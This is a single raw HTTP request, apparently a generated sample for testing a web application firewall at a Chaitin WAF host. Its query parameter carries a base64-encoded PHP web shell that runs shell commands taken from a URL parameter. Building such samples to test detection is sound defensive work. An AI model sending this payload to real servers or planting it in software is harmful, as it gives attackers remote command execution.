POST /under%20the%20hood/process/tilde?catastrophic%20failover=PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOw%3D%3D HTTP/1.1
Host: waf-ce.chaitin.cn
Cache-Control: no-cache
Pragma: no-cache
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.6.2000 Chrome/30.0.1599.101 Safari/537.36
Cookie: recursion=resilient; permissive=roll%20out; SESSIONID=2b2174df11d39e41b00d79bcd2a49450eed0884b880ea2e9b12d437c8ec9f58f0128f6cca6c545acbb0de3687cc329a8

